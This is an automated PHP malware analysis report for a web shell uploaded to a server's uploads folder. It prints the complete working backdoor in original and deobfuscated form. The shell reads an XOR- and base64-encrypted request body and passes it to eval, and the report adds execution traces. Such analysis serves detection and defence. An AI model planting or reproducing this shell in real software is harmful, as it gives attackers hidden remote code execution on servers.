PHP Malware Analysis
05199.php, shell.php
md5: 7da376a9148f84e5353cb9d11721935d
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Encoding
- base64_decode (Deobfuscated, Traces)
Environment
- error_reporting (Deobfuscated, Original, Traces)
Execution
- eval (Deobfuscated, Original)
Files
- file_get_contents (Deobfuscated, Original)
Input
- php:\/\/input (Deobfuscated, Original, Traces)
Deobfuscated PHP code
<?php
@error_reporting(0);
function Decrypt($data)
{
$key = "e45e329feb5d925b";
$bs = "base64_decode";
$after = base64_decode($data . "");
for ($i = 0; $i < strlen($after); $i++) {
$after[$i] ^= $key[$i + 1 & 15];
}
return $after;
}
$post = Decrypt(file_get_contents("php://input"));
eval($post);Execution traces
data/traces/7da376a9148f84e5353cb9d11721935d_trace-1676251421.2714.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:24:07.169230]
1 0 1 0.000168 393512
1 3 0 0.000242 396656 {main} 1 /var/www/html/uploads/shell.php 0 0
2 4 0 0.000259 396656 error_reporting 0 /var/www/html/uploads/shell.php 2 1 0
2 4 1 0.000274 396696
2 4 R 0
2 5 0 0.000288 396656 file_get_contents 0 /var/www/html/uploads/shell.php 13 1 'php://input'
2 5 1 0.000308 397392
2 5 R ''
2 6 0 0.000322 397352 Decrypt 1 /var/www/html/uploads/shell.php 13 1 ''
2 A /var/www/html/uploads/shell.php 5 $key = 'e45e329feb5d925b'
2 A /var/www/html/uploads/shell.php 6 $bs = 'base64_decode'
3 7 0 0.000359 397352 base64_decode 0 /var/www/html/uploads/shell.php 7 1 ''
3 7 1 0.000372 397416
3 7 R ''
2 A /var/www/html/uploads/shell.php 7 $after = ''
2 A /var/www/html/uploads/shell.php 8 $i = 0
2 6 1 0.000405 397384
2 6 R ''
1 A /var/www/html/uploads/shell.php 13 $post = ''
1 3 1 0.000430 397416
0.000454 316144
TRACE END [2023-02-12 23:24:07.169547]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:18:19.616903]
1 0 1 0.000157 393512
1 3 0 0.000228 396656 {main} 1 /var/www/html/uploads/05199.php 0 0
2 4 0 0.000245 396656 error_reporting 0 /var/www/html/uploads/05199.php 2 1 0
2 4 1 0.000261 396696
2 4 R 0
2 5 0 0.000275 396656 file_get_contents 0 /var/www/html/uploads/05199.php 13 1 'php://input'
2 5 1 0.000295 397392
2 5 R ''
2 6 0 0.000309 397352 Decrypt 1 /var/www/html/uploads/05199.php 13 1 ''
2 A /var/www/html/uploads/05199.php 5 $key = 'e45e329feb5d925b'
2 A /var/www/html/uploads/05199.php 6 $bs = 'base64_decode'
3 7 0 0.000346 397352 base64_decode 0 /var/www/html/uploads/05199.php 7 1 ''
3 7 1 0.000359 397416
3 7 R ''
2 A /var/www/html/uploads/05199.php 7 $after = ''
2 A /var/www/html/uploads/05199.php 8 $i = 0
2 6 1 0.000394 397384
2 6 R ''
1 A /var/www/html/uploads/05199.php 13 $post = ''
1 3 1 0.000418 397416
0.000444 316144
TRACE END [2023-02-13 02:18:19.617222]
Generated HTML code
<html><head></head><body></body></html>Original PHP code
<?php
@error_reporting(0);
function Decrypt($data)
{
$key="e45e329feb5d925b";
$bs="base64_"."decode";
$after=$bs($data."");
for($i=0;$i<strlen($after);$i++) {
$after[$i] = $after[$i]^$key[$i+1&15];
}
return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>